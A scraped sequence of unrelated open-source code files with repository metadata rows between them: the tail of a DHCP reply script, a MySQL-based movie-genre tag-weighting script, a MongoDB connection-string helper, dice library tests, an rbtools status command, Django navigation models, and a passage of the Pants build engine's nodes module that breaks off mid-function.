full_dhcp_packet.update(dhcp_packet_dict)
reply(full_dhcp_packet)
# endregion
# endregion
# endregion
# endregion
# endregion
# endregion
# region Exception - KeyboardInterrupt
except KeyboardInterrupt:
Base.print_info("Exit")
exit(0)
# endregion
# endregion
# endregion
# endregion
| unlicense | 2,859,265,539,066,611,700 | 41.478261 | 131 | 0.544649 | false |
jadhavhninad/-CSE_515_MWD_Analytics- | Phase 1/Project Code/phase1_code/differentiate_genre.py | 1 | 17298 | from mysqlConn import DbConnect
import argparse
import operator
from math import log,fabs
import pprint
# DB connector and cursor
db = DbConnect()
db_conn = db.get_connection()
cur2 = db_conn.cursor();
#Argument parser
parser = argparse.ArgumentParser()
parser.add_argument("GENRE1")
parser.add_argument("GENRE2")
parser.add_argument("MODEL")
args = parser.parse_args()
##########################################
#General computation
#########################################
#1. Getting total number of movies in genre1 U genre2
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = float(result0[0])
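# Illustrative helper (not part of the original script): the probabilistic feedback weight used by
# the P-DIFF models below, factored out for clarity. The smoothing term p_tag and the base-2 log
# mirror the inline formulas further down; r, R, m and M carry the same meaning as in those branches.
def pdiff_weight_example(r, R, m, M):
    p_tag = float(m) / M
    val1 = float(r + p_tag) / (R - r + 1)
    val2 = float(m - r + p_tag) / (M - m - R + r + 1)
    val3 = float(r + p_tag) / (R + 1)
    val4 = float(m - r + p_tag) / (M - R + 1)
    return log(val1 / val2, 2) * (val3 - val4)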
if args.MODEL== "TF-IDF-DIFF":
###############################
#MODEL = TF_IDF_DIFF
###############################
#===============================================================================================
    # Subtask-1: Calculate the weighted count of unique movies matched by each tag across the movies in genre1 U genre2
#===============================================================================================
cur2.execute("SELECT COUNT(distinct movieid) FROM mlmovies_clean where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result0 = cur2.fetchone()
total_movie_count = result0[0]
    # Since we already have the TF values and their data, we now generate the data required for IDF.
    # IDF here is based on the number of movie-genre entries that carry a certain tag, so the IDF calculation is:
    # total movie-genres / sum of the weights of movie-genre entries with a particular tag.
    # Calculate the total weighted movie-genre count for each tag.
    # The weighted count for one occurrence of a tag = tag_newness
weighted_genre_movie_count={}
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
#print data1
genre_movie_id = data1[0]
genre_tag_id=""
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID. For each tag weight, add the rank_weight as well.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round((float(genre_tag_newness)),10)
if tagName in weighted_genre_movie_count:
weighted_genre_movie_count[tagName] = round((weighted_genre_movie_count[tagName] + tagWeight), 10)
else:
weighted_genre_movie_count[tagName] = tagWeight
# ===============================================================================
#Subtask-2: Get the TF , IDF and TF-IDF for the genres
#===============================================================================
data_dictionary_tf_genre1 = {}
data_dictionary_tf_idf_genre1 = {}
total_tag_newness_weight = 0
#Get all movies of genre 1.
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[tagName] = round((data_dictionary_tf_genre1[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre1[tagName] = tagWeight
# Make weight of other tags to zero. Calculate the tf, idf and tf-idf values for the tags that exist.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in data_dictionary_tf_genre1:
data_dictionary_tf_genre1[key] = round((float(data_dictionary_tf_genre1[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre1[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre1[key] = round((data_dictionary_tf_genre1[key] * data_dictionary_tf_idf_genre1[key]), 10)
else:
data_dictionary_tf_genre1[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#Get all movies of a specific genre 2.
#--------------------------------------
data_dictionary_tf_genre2 = {}
data_dictionary_tf_idf_genre2 = {}
total_tag_newness_weight = 0
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid,newness_wt_norm_nolog FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
genre_tag_newness = data2[1]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
tagWeight = round(float(genre_tag_newness),10)
total_tag_newness_weight = total_tag_newness_weight + tagWeight
#For TF
if tagName in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[tagName] = round((data_dictionary_tf_genre2[tagName] + tagWeight),10)
else:
data_dictionary_tf_genre2[tagName] = tagWeight
# Make weight of other tags to zero.
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key=keyVal[0]
if key in data_dictionary_tf_genre2:
data_dictionary_tf_genre2[key] = round((float(data_dictionary_tf_genre2[key]) / float(total_tag_newness_weight)),10)
data_dictionary_tf_idf_genre2[key] = round((float(log((total_movie_count/weighted_genre_movie_count[key]),2.71828))), 10)
data_dictionary_tf_idf_genre2[key] = round((data_dictionary_tf_genre2[key] * data_dictionary_tf_idf_genre2[key]), 10)
else:
data_dictionary_tf_genre2[key] = 0.0
#genre_model_value_tf_genre1 = sorted(data_dictionary_tf_genre1.items(), key=operator.itemgetter(1), reverse=True)
#genre_model_value_tfidf_genre2 = sorted(data_dictionary_tf_genre2.items(), key=operator.itemgetter(1), reverse=True)
#--------------------------------------------------------------------------------------------------------------
#Subtask-3 : Calculate the DIFF vector
#Manhattan distance is used since for high dimensions it works better. compared to higher order minkowski distance
diff_vector={}
#Makes more sense to have +ve 0, and -ve as it clearly states the difference, between genre1
#and genre2.
for key in data_dictionary_tf_idf_genre1:
if key in data_dictionary_tf_idf_genre2:
diff_vector[key] = data_dictionary_tf_idf_genre1[key] - data_dictionary_tf_idf_genre2[key]
else:
diff_vector[key] = data_dictionary_tf_idf_genre1[key]
for key in data_dictionary_tf_idf_genre2:
if key in diff_vector:
continue
else:
diff_vector[key] = 0 - data_dictionary_tf_idf_genre2[key]
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyVal in tagName:
key = keyVal[0]
if key in diff_vector:
continue;
else:
diff_vector[key] = 0.0
genre_diff = sorted(diff_vector.items(), key=operator.itemgetter(1), reverse=True)
#pprint.pprint(genre_model_value_tfidf_genre1)
#pprint.pprint(genre_model_value_tfidf_genre2)
pprint.pprint(genre_diff)
elif args.MODEL == "P-DIFF1" :
###############################
#MODEL = P-DIFF-1
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre1
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
#Calculation for genre1. r = movies in genre1 with tag t
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE1])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
#Calculation for m=movies in genre1 U genre 2 with tag t
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#print dd_r1_genre1
#print dd_m1_genre2
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r=0
if tag in dd_r1_genre1:
r = float(dd_r1_genre1[tag])
m = float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
        # r = 0 means the tag never occurs for the genre.
        # R = r means the tag occurs for every movie of the genre, so its frequency is 1 and its
        # discriminating power is 0. In both scenarios such a tag is effectively ignored.
        # m >= r always, since M is a union.
        # Get the probability of the tag in M and add it to avoid edge cases - ref: Salton & Buckley.
        p_tag = float(m / M)
        # A squared term could be argued for here, but since the maximum probability is 1 it makes
        # little difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * float(val3 - val4)
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
elif args.MODEL == "P-DIFF2":
###############################
#MODEL = P-DIFF-2
###############################
# ===============================================================================
#Subtask-1: Calculate the number of movies for a given tag for genre1 and genre2
#and total movies in genre2
#================================================================================
dd_r1_genre1 = {}
dd_m1_genre2 = {}
M = total_movie_count #Movies in genre1 U genre2
cur2.execute("SELECT count(movieid) FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchone()
R = float(result1[0]) #Movies in genre1
    # Calculation for genre2. r = movies in genre2 without tag t. We first count, for each tag, the movies
    # in genre2 that have tag t and later subtract that count from the total number of movies in genre2.
cur2.execute("SELECT movieid FROM `mlmovies_clean` where genres = %s",[args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_r1_genre1:
dd_r1_genre1[tagName] = (dd_r1_genre1[tagName] + 1)
else:
dd_r1_genre1[tagName] = 1
    # Calculation for m = movies in genre1 U genre2 without tag t. The count of movies with the tag is
    # gathered here and subtracted from M later to obtain the movies without the tag.
cur2.execute("SELECT distinct(movieid) FROM `mlmovies_clean` where genres=%s || genres=%s",[args.GENRE1,args.GENRE2])
result1 = cur2.fetchall()
for data1 in result1:
genre_movie_id = data1[0]
#Select distint tagIDs for the movieID
cur2.execute("SELECT tagid FROM mltags WHERE movieid = %s",[genre_movie_id])
result2 = cur2.fetchall()
for data2 in result2:
genre_tag_id = data2[0]
#Get the tag_name for the tagID.
cur2.execute("SELECT tag FROM `genome-tags` WHERE tagID = %s", [genre_tag_id])
result2_sub = cur2.fetchone()
tagName = result2_sub[0]
#For TF
if tagName in dd_m1_genre2:
dd_m1_genre2[tagName] = (dd_m1_genre2[tagName] + 1)
else:
dd_m1_genre2[tagName] = 1
#Subtask:2 - Calculate the pdiff1 using the given formula
pdiff_wt_genre1={}
for tag in dd_m1_genre2:
r = R
if tag in dd_r1_genre1:
r = R - float(dd_r1_genre1[tag])
m = M - float(dd_m1_genre2[tag])
val1=0
val2=0
val3=0
val4=0
        # r = 0 means the tag never occurs for the genre.
        # R = r means the tag occurs for every movie of the genre, so its frequency is 1 and its
        # discriminating power is 0. In both scenarios such a tag is effectively ignored.
        # m >= r always, since M is a union.
        # Get the probability of the tag not being in M and add it to avoid edge cases - ref: Salton & Buckley.
        p_tag = float(m / M)
        # A squared term could be argued for here, but since the maximum probability is 1 it makes
        # little difference for values less than 1.
val1 = float(float(r + p_tag)/(R-r+1))
val3 = float(float(r + p_tag)/(R + 1))
val2 = float((m-r+p_tag)/(M-m-R+r+1))
val4 = float((m-r+p_tag)/(M-R+1))
pdiff_wt_genre1[tag] = float(log(float(val1/val2),2)) * (float(val3 - val4))
#Make weight of other tags to zero
cur2.execute("SELECT tag FROM `genome-tags`")
tagName = cur2.fetchall()
for keyval in tagName:
key = keyval[0]
if key in pdiff_wt_genre1:
continue
else:
pdiff_wt_genre1[key] = 0
pprint.pprint(sorted(pdiff_wt_genre1.items(), key=operator.itemgetter(1), reverse=True))
| gpl-3.0 | 3,274,444,029,248,706,600 | 33.875 | 133 | 0.578737 | false |
mettadatalabs1/oncoscape-datapipeline | db/db_config.py | 1 | 2247 | from yaml import load as load_yaml
config_file = "/Users/namelessnerd/oncodata/db/connection_params.yml"
def load_db_configuration(config_file=config_file):
with open(config_file, "r") as config_file:
configs = load_yaml(config_file)
return configs
def create_mongo_protocol(project_id, connection_params):
"""
Returns a connection string according to the mongo protocol,
mongodb://[username:pwd@]host1[:port1][,host2[:port2]][/[db][?options]]
Refer to https://docs.mongodb.com/manual/reference/connection-string/
    Args:
        project_id (str): The project id used in the connection params file for
            which we are creating this connection.
        connection_params (str): Path to the YAML file holding the database
            connection configurations.
    Returns:
        (str): Connection string formatted per the MongoDB connection string format.
    """
conn_string = "mongodb://{user_name}:{pwd}@{host_port}/{db}?{options}"
# configs (dict) - dictionary object holding the database configurations
configs = load_db_configuration(connection_params)
try:
user = configs[project_id]["user_name"]
pwd = configs[project_id]["password"]
hosts = configs[project_id]["hosts"]
db=configs[project_id]["db"]
print(hosts)
except KeyError:
return None
options = configs[project_id]["options"]\
if "options" in configs[project_id] else None
return conn_string.format(user_name=user,
pwd=pwd,
                              # join the host and port if a port is specified, else
                              # use the default port
host_port=",".join([host["host"] + ":" +
(str(host["port"]) if "port" in host
else "27017")
for host in hosts]),
db=db,
                              # include options if options are specified, else an empty
                              # string
options="&".join([option + "=" + options[option]\
for option in options]) if options else '')
# host: "mongo://" +\
# db_config.creds["host_name"]["user"] +\
# db_config.creds["host_name"]["pwd"] +\
# "@" + host_name
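# Illustrative usage sketch (assumption, not part of the original module): handing the generated
# URI to pymongo. The project id below is only an example value, and pymongo is not a dependency
# declared anywhere in this file.
def connect_example(project_id="oncoscape"):
    from pymongo import MongoClient
    uri = create_mongo_protocol(project_id, config_file)
    return MongoClient(uri) if uri else None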
| apache-2.0 | -1,887,707,074,555,252,500 | 43.058824 | 78 | 0.546951 | false |
campaul/dicebox | dicebox/test/test_dice.py | 1 | 4083 | import mock
import pytest
from dicebox.dice import Add, Best, Die, DiceFactory, Modifier, Pool, Sort, Worst
class TestDiceFactory(object):
@pytest.fixture
def sides(self):
return 20
def test_call(self, sides):
assert type(DiceFactory()(sides)) == Die
def test_bias(self, sides):
rng = mock.Mock()
factory = DiceFactory()
with factory.bias(rng):
factory(20)()
rng.assert_called_with(1, 20)
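# Illustrative usage sketch (assumption, not an added test): the dice expressions exercised by the
# test classes below, written out as they might be rolled with the factory's default random source.
def roll_examples():
    d20 = DiceFactory()(20)
    return int(d20 + 2), (3 * d20).each(), int(Best(Pool(d20, 4), 3))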
class TestDie(object):
@pytest.fixture
def count(self):
return 5
@pytest.fixture
def die(self, rng):
return Die(20, rng)
@pytest.fixture
def random(self):
return 4
@pytest.fixture
def rng(self, random):
return mock.Mock(return_value=random)
def test_call(self, die, random, rng):
assert die() == random
rng.assert_called_with(1, 20)
def test_each(self, die, random, rng):
assert die.each() == random
rng.assert_called_with(1, 20)
def test_mul(self, count, die, random):
pool = die * count
assert pool.each() == [random for i in range(count)]
def test_rmul(self, count, die, random):
pool = count * die
assert pool.each() == [random for i in range(count)]
def test_add(self, count, die):
pool = die + count
assert pool.each() == [die.each(), count]
def test_sub(self, count, die):
pool = die - count
assert pool.each() == [die.each(), -count]
def test_int(self, die, random):
assert int(die) == random
class TestModifier(object):
randoms = None
def log_random(self, r):
if self.randoms is None:
self.randoms = []
self.randoms.append(r)
return r
@pytest.fixture
def count(self):
return 5
@pytest.fixture
def rng_value(self):
return 4
@pytest.fixture
def rng(self, rng_value):
return lambda start, finish: self.log_random(rng_value)
@pytest.fixture
def die(self, rng):
return Die(20, rng)
@pytest.fixture
def modifier(self, die, count):
return Modifier(die, count)
def test_each(self, modifier, count):
assert modifier.each() == self.randoms
def test_int(self, modifier, rng_value, count):
assert int(modifier) == sum(self.randoms)
class TestPool(TestModifier):
@pytest.fixture
def rng(self):
def rng(start, end):
if self.randoms is None:
return self.log_random(1)
else:
return self.log_random(self.randoms[-1] + 1)
return rng
@pytest.fixture
def modifier(self, die, count):
return Pool(die, count)
def test_rshift(self, modifier):
assert (modifier >> 2).each() == [4, 5]
def test_lshift(self, modifier):
assert (modifier << 2).each() == [1, 2]
class TestAdd(TestModifier):
@pytest.fixture
def modifier(self, die, count):
return Add(die, count)
def test_each(self, modifier, count):
assert modifier.each() == self.randoms + [count]
def test_int(self, modifier, count):
assert int(modifier) == sum(self.randoms + [count])
class TestSort(TestModifier):
@pytest.fixture
def modifier(self, die, count):
return Sort(Pool(die, count), None)
    def result(self):
        return sorted(self.randoms)
def test_each(self, modifier):
assert modifier.each() == self.result()
def test_int(self, modifier):
assert int(modifier) == sum(self.result())
class TestBest(TestSort):
@pytest.fixture
def modifier(self, die, count):
return Best(Pool(die, count), count - 1)
def result(self):
return sorted(self.randoms)[1:]
class TestWorst(TestSort):
@pytest.fixture
def modifier(self, die, count):
return Worst(Pool(die, count), count - 1)
def result(self):
return sorted(self.randoms)[:-1]
| mit | 7,768,028,179,165,356,000 | 21.311475 | 81 | 0.590987 | false |
brettdh/rbtools | rbtools/commands/status.py | 1 | 2506 | import logging
from rbtools.commands import Command, Option
from rbtools.utils.repository import get_repository_id
from rbtools.utils.users import get_username
class Status(Command):
"""Display review requests for the current repository."""
name = "status"
author = "The Review Board Project"
description = "Output a list of your pending review requests."
args = ""
option_list = [
Option("--all",
dest="all_repositories",
action="store_true",
default=False,
help="Show review requests for all repositories instead "
"of the detected repository."),
Command.server_options,
Command.repository_options,
Command.perforce_options,
]
def output_request(self, request):
print " r/%s - %s" % (request.id, request.summary)
def output_draft(self, request, draft):
print " * r/%s - %s" % (request.id, draft.summary)
def main(self):
repository_info, tool = self.initialize_scm_tool(
client_name=self.options.repository_type)
server_url = self.get_server_url(repository_info, tool)
api_client, api_root = self.get_api(server_url)
self.setup_tool(tool, api_root=api_root)
username = get_username(api_client, api_root, auth_required=True)
query_args = {
'from_user': username,
'status': 'pending',
'expand': 'draft',
}
if not self.options.all_repositories:
repo_id = get_repository_id(
repository_info,
api_root,
repository_name=self.options.repository_name)
if repo_id:
query_args['repository'] = repo_id
else:
logging.warning('The repository detected in the current '
'directory was not found on\n'
'the Review Board server. Displaying review '
'requests from all repositories.')
requests = api_root.get_review_requests(**query_args)
try:
while True:
for request in requests:
if request.draft:
self.output_draft(request, request.draft[0])
else:
self.output_request(request)
requests = requests.get_next(**query_args)
except StopIteration:
pass
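# Illustrative sketch (assumption, not part of rbtools): the paging pattern used in main() above,
# generalized to any list resource that exposes get_next() and raises StopIteration when exhausted.
def iterate_all(resource, **query_args):
    while True:
        for item in resource:
            yield item
        try:
            resource = resource.get_next(**query_args)
        except StopIteration:
            return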
| mit | 7,896,034,050,389,022,000 | 33.805556 | 77 | 0.553472 | false |
mennanov/django-blueprint | project_name/apps/navigation/models.py | 1 | 1661 | # -*- coding: utf-8 -*-
from django.db import models
from django.utils.translation import ugettext_lazy as _
from mptt.models import TreeForeignKey, TreeManyToManyField, MPTTModel
class Navigation(models.Model):
"""
Navigation menu
"""
key = models.CharField(_(u'key'), max_length=32, help_text=_(u'This value is used in the code, do not touch it!'))
name = models.CharField(_(u'name'), max_length=70)
links = TreeManyToManyField('Link', verbose_name=_(u'links'), through='LinkMembership')
def __unicode__(self):
return self.name
class Meta:
verbose_name = _(u'navigation menu')
verbose_name_plural = _(u'navigation menus')
class Link(MPTTModel):
"""
Navigation link
"""
parent = TreeForeignKey('self', verbose_name=_(u'parent link'), null=True, blank=True)
name = models.CharField(_(u'name'), max_length=70, help_text=_(u'Name of the link in the menu'))
url = models.CharField(_(u'url'), max_length=255, help_text=_(u'Example: "/about/" or "/"'))
def __unicode__(self):
return self.name
def get_absolute_url(self):
return self.url
class Meta:
verbose_name = _(u'navigation link')
verbose_name_plural = _(u'navigation links')
class LinkMembership(models.Model):
"""
Link in navigation membership
"""
navigation = models.ForeignKey('Navigation')
link = TreeForeignKey('Link')
position = models.PositiveIntegerField(_(u'position'), default=0, db_index=True)
class Meta:
ordering = ['position']
verbose_name = _(u'link membership')
verbose_name_plural = _(u'link memberships') | gpl-2.0 | -8,933,735,953,260,462,000 | 30.358491 | 118 | 0.64118 | false |
ity/pants | src/python/pants/engine/nodes.py | 1 | 17119 | # coding=utf-8
# Copyright 2015 Pants project contributors (see CONTRIBUTORS.md).
# Licensed under the Apache License, Version 2.0 (see LICENSE).
from __future__ import (absolute_import, division, generators, nested_scopes, print_function,
unicode_literals, with_statement)
from abc import abstractmethod, abstractproperty
from os.path import dirname
from pants.build_graph.address import Address
from pants.engine.addressable import parse_variants
from pants.engine.fs import (Dir, DirectoryListing, File, FileContent, Link, Path, ReadLink, Stats,
file_content, list_directory, path_stat, read_link)
from pants.engine.struct import HasStructs, Variants
from pants.util.meta import AbstractClass
from pants.util.objects import datatype
class ConflictingProducersError(Exception):
"""Indicates that there was more than one source of a product for a given subject.
TODO: This will need to be legal in order to support multiple Planners producing a
(mergeable) Classpath for one subject, for example. see:
https://github.com/pantsbuild/pants/issues/2526
"""
@classmethod
def create(cls, subject, product, matches):
"""Factory method to format the error message.
This is provided as a workaround to http://bugs.python.org/issue17296 to make this exception
picklable.
"""
msgs = '\n '.join('{}: {}'.format(k, v) for k, v in matches.items())
return ConflictingProducersError('More than one source of {} for {}:\n {}'
.format(product.__name__, subject, msgs))
def __init__(self, message):
super(ConflictingProducersError, self).__init__(message)
class State(object):
@classmethod
def raise_unrecognized(cls, state):
raise ValueError('Unrecognized Node State: {}'.format(state))
class Noop(datatype('Noop', ['msg']), State):
"""Indicates that a Node did not have the inputs which would be needed for it to execute."""
class Return(datatype('Return', ['value']), State):
"""Indicates that a Node successfully returned a value."""
class Throw(datatype('Throw', ['exc']), State):
"""Indicates that a Node should have been able to return a value, but failed."""
class Waiting(datatype('Waiting', ['dependencies']), State):
"""Indicates that a Node is waiting for some/all of the dependencies to become available.
Some Nodes will return different dependency Nodes based on where they are in their lifecycle,
but all returned dependencies are recorded for the lifetime of a ProductGraph.
"""
class Node(AbstractClass):
@classmethod
def validate_node(cls, node):
if not isinstance(node, Node):
raise ValueError('Value {} is not a Node.'.format(node))
@abstractproperty
def subject(self):
"""The subject for this Node."""
@abstractproperty
def product(self):
"""The output product for this Node."""
@abstractproperty
def variants(self):
"""The variants for this Node."""
@abstractproperty
def is_cacheable(self):
"""Whether node should be cached or not."""
@abstractmethod
def step(self, dependency_states, step_context):
"""Given a dict of the dependency States for this Node, returns the current State of the Node.
The NodeBuilder parameter provides a way to construct Nodes that require information about
installed tasks.
TODO: The NodeBuilder is now a StepContext... rename everywhere.
After this method returns a non-Waiting state, it will never be visited again for this Node.
TODO: Not all Node types actually need the `subject` as a parameter... can that be pushed out
as an explicit dependency type? Perhaps the "is-a/has-a" checks should be native outside of Node?
"""
class SelectNode(datatype('SelectNode', ['subject', 'product', 'variants', 'variant_key']), Node):
"""A Node that selects a product for a subject.
A Select can be satisfied by multiple sources, but fails if multiple sources produce a value. The
'variants' field represents variant configuration that is propagated to dependencies. When
a task needs to consume a product as configured by the variants map, it uses the SelectVariant
selector, which introduces the 'variant' value to restrict the names of values selected by a
SelectNode.
"""
@property
def is_cacheable(self):
return False
def _variants_node(self):
if type(self.subject) is Address and self.product is not Variants:
return SelectNode(self.subject, Variants, self.variants, None)
return None
def _select_literal(self, candidate, variant_value):
"""Looks for has-a or is-a relationships between the given value and the requested product.
Returns the resulting product value, or None if no match was made.
"""
def items():
# Check whether the subject is-a instance of the product.
yield candidate
# Else, check whether it has-a instance of the product.
if isinstance(candidate, HasStructs):
for subject in getattr(candidate, candidate.collection_field):
yield subject
# TODO: returning only the first literal configuration of a given type/variant. Need to
# define mergeability for products.
for item in items():
if not isinstance(item, self.product):
continue
if variant_value and not getattr(item, 'name', None) == variant_value:
continue
return item
return None
def step(self, dependency_states, step_context):
# Request default Variants for the subject, so that if there are any we can propagate
# them to task nodes.
variants = self.variants
variants_node = self._variants_node()
if variants_node:
dep_state = dependency_states.get(variants_node, None)
if dep_state is None or type(dep_state) == Waiting:
return Waiting([variants_node])
elif type(dep_state) == Return:
# A subject's variants are overridden by any dependent's requested variants, so
# we merge them left to right here.
variants = Variants.merge(dep_state.value.default.items(), variants)
# If there is a variant_key, see whether it has been configured.
variant_value = None
if self.variant_key:
variant_values = [value for key, value in variants
if key == self.variant_key] if variants else None
if not variant_values:
# Select cannot be satisfied: no variant configured for this key.
return Noop('Variant key {} was not configured in variants {}'.format(
self.variant_key, variants))
variant_value = variant_values[0]
# If the Subject "is a" or "has a" Product, then we're done.
literal_value = self._select_literal(self.subject, variant_value)
if literal_value is not None:
return Return(literal_value)
# Else, attempt to use a configured task to compute the value.
has_waiting_dep = False
dependencies = list(step_context.gen_nodes(self.subject, self.product, variants))
matches = {}
for dep in dependencies:
dep_state = dependency_states.get(dep, None)
if dep_state is None or type(dep_state) == Waiting:
has_waiting_dep = True
continue
elif type(dep_state) == Throw:
return dep_state
elif type(dep_state) == Noop:
continue
elif type(dep_state) != Return:
State.raise_unrecognized(dep_state)
# We computed a value: see whether we can use it.
literal_value = self._select_literal(dep_state.value, variant_value)
if literal_value is not None:
matches[dep] = literal_value
if has_waiting_dep:
return Waiting(dependencies)
elif len(matches) > 1:
# TODO: Multiple successful tasks are not currently supported. We should allow for this
# by adding support for "mergeable" products. see:
# https://github.com/pantsbuild/pants/issues/2526
return Throw(ConflictingProducersError.create(self.subject, self.product, matches))
elif len(matches) == 1:
return Return(matches.values()[0])
return Noop('No source of {}.'.format(self))
class DependenciesNode(datatype('DependenciesNode', ['subject', 'product', 'variants', 'dep_product', 'field']), Node):
"""A Node that selects the given Product for each of the items in a field `field` on this subject.
Begins by selecting the `dep_product` for the subject, and then selects a product for each
member a collection named `field` on the dep_product.
The value produced by this Node guarantees that the order of the provided values matches the
order of declaration in the list `field` of the `dep_product`.
"""
@property
def is_cacheable(self):
return False
def _dep_product_node(self):
return SelectNode(self.subject, self.dep_product, self.variants, None)
def _dependency_nodes(self, step_context, dep_product):
for dependency in getattr(dep_product, self.field or 'dependencies'):
variants = self.variants
if isinstance(dependency, Address):
# If a subject has literal variants for particular dependencies, they win over all else.
dependency, literal_variants = parse_variants(dependency)
variants = Variants.merge(variants, literal_variants)
yield SelectNode(dependency, self.product, variants, None)
def step(self, dependency_states, step_context):
# Request the product we need in order to request dependencies.
dep_product_node = self._dep_product_node()
dep_product_state = dependency_states.get(dep_product_node, None)
if dep_product_state is None or type(dep_product_state) == Waiting:
return Waiting([dep_product_node])
elif type(dep_product_state) == Throw:
return dep_product_state
elif type(dep_product_state) == Noop:
return Noop('Could not compute {} to determine dependencies.'.format(dep_product_node))
elif type(dep_product_state) != Return:
State.raise_unrecognized(dep_product_state)
# The product and its dependency list are available.
dependencies = list(self._dependency_nodes(step_context, dep_product_state.value))
for dependency in dependencies:
dep_state = dependency_states.get(dependency, None)
if dep_state is None or type(dep_state) == Waiting:
# One of the dependencies is not yet available. Indicate that we are waiting for all
# of them.
return Waiting([dep_product_node] + dependencies)
elif type(dep_state) == Throw:
return dep_state
elif type(dep_state) == Noop:
